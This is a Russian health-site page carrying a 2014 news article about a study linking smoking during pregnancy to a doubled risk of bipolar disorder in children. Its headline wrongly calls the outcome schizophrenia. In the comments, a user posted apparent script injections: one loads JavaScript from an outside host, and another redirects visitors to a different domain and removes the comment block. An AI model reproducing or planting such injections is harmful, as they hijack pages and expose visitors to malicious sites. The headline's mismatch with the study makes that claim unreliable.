Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Курение во время беременн...  >>  Курение во время беременности сделает вашего ребенка шизофреником
 
Обратная связь
 

Курение во время беременности сделает вашего ребенка шизофреником

Размер шрифта
03 сентября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Наверняка вы уже не раз слышали о том, что курить вредно. И тому есть множество причин. Однако ученым удалось обнаружить еще одно вредное влияние, которое оказывает табак: оказывается, дети курящих женщин чаще страдают от заболеваний психики.

Курение во время беременности сделает вашего ребенка шизофреником

Работа, опубликованная в American Journal of Psychiatry, предполагает наличие связи между курением во время беременности и повышенным риском развития биполярного расстройства у детей таких курильщиц. Ученые из Института психиатрии штата Нью-Йорк и из отдела эпидемиологии Колумбийского университета, работая совместно с учеными исследовательского центра Кайзер в Окленде, исследовали большую группу детей и их матерей. Как показали результаты, курение во время беременности было связано с двукратным повышением риска биполярного расстройства.

Курение во время беременности, как известно, приводит к определенным проблемам во внутриутробном периоде, а также в развитии ребенка, таким как малый вес при рождении и нарушение внимания.

Это первое исследование, в котором была выявлена связь между воздействием табака в период беременности и биполярным расстройством. Биполярное расстройство – серьезное психическое заболевание, которое проявляется определенными изменениями настроения, меняющегося от депрессии к мании. Симптомы обычно становятся заметны в конце подросткового периода или у молодых людей.

«Эти данные лишь подчеркивают всю важность непрерывного образования населения в вопросах охраны здоровья, важность осознания всех негативных последствий для ребенка, вызванных курением, которые можно было предотвратить», – отмечает доктор Алан Браун, ведущий автор работы и профессор клинической психиатрии и эпидемиологии.

Авторы пишут в своей работе: «Многие расстройства психики связаны с курением табака во время беременности: синдром дефицита внимания и гиперактивности, нарушения поведения и расстройства, связанные со злоупотреблением алкоголем и наркотическими препаратами. Биполярное расстройство имеет некоторые общие клинические характеристики с этими заболеваниями, включая нарушение внимания, раздражительность, потерю самоконтроля и склонность к употреблению алкоголя и наркотиков». Фактически, дети, которые внутриутробно подверглись влиянию табака, могут иметь некоторые симптомы, которые присущи биполярному расстройству.

Также предыдущее исследование доктора Брауна показало, что вирус гриппа у беременных связан с четырехкратным увеличением риска развития биполярного расстройства у ребенка.

Так что бросайте курить, не заставляйте своего ребенка расплачиваться здоровьем за вашу вредную привычку.
Другие материалы о беременности и материнстве ищите на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:30

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Все куришь? Только ИНВИТРО заботится о тебе   Беременность: как обезопасить себя и будущего малыша от вирусов   Худшая еда для беременной   ВИЧ и беременность. Как защититься?  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Как повысить свою плодовитость
Можно ли пережить беременность без рвоты?
Можно ли подгадать с беременностью?

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.